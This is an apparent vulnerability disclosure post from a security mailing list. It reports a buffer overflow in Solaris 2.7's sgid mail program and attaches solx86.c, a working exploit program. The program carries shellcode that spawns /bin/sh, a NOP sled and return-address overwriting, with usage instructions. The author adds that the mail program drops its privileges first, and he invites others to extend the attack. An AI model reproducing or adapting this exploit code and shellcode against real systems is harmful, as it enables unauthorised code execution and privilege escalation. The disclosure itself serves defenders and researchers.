Greetings,

There is a possible buffer overflow vulnerability in Solaris 2.7's sgid
mail /usr/bin/mail.  The reason it's only a possibility and not a full
blow exploit is that mail drops sgid privs before the overflow occurs.
However as we've seen in several past posts, this is not necessarily a
bulletproof method of making ones program secure.  Obviously mail needs
these privs to perform some function, probably opening the appropriate
mail owned files to deliver mail.  My guess would be that in the
following usage, mail would need write (read?) access to foo's mail file.

 bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo
.
mail: ERROR signal 11
bash-2.02$

In any case, this overflow does allow execution of any command you wish
as shown in the program at the end of this message.  I would imagine that
with some careful asm code, one would be able to exploit the specific
vulnerability that may exist.  Information on exactly what mail does with
it's s bit would be helpful.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

--- solx86.c ---
/*
 * Generic Solaris x86 exploit program by Brock Tellier
 * Shellcode by Cheez Whiz
 * gcc -o mailex solx86.c
 * /usr/bin/mail -m `./mailex 0 1985 2285` foo
   . <period, enter>
   $ <not a rootshell ;)>

 * Usage: ./mailex <offset> <NOPS> <BUFSIZE>
 *
 * Demonstrative program for mail vulnerability. mail apparently drops
privs
 * before the overflow occurs so we're not going to have a sgid mail
shell.
 * Perhaps someone could make some 'shellcode' to exploit an open file
 * descriptor or something (whatever the reason mail is sgid mail).
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF 10000
#define NOP 0x90

char shell[] =
"\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
"\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
"\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
"\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
"\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff";

unsigned long int nop;
unsigned long int esp;
long int offset;

char buf[BUF];

unsigned long int get_esp()
{
    __asm__("movl %esp,%eax");
}

void
main (int argc, char *argv[])
{
    int buflen, i;


    if (argc > 1)
        offset = strtol(argv[1], NULL, 0);

    if (argc > 2)
        nop = strtoul(argv[2], NULL, 0);
    else
        nop = 285;

    if (argc > 3)
        buflen=atoi(argv[3]);
    else
        buflen=BUF;

    esp = get_esp();


    memset(buf, NOP, buflen);
    memcpy(buf+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < buflen-4; i += 4)
        *((int *) &buf[i]) = esp+offset;

    for (i = 0; i < strlen(buf); i++) putchar(buf[i]);

    return;
}
---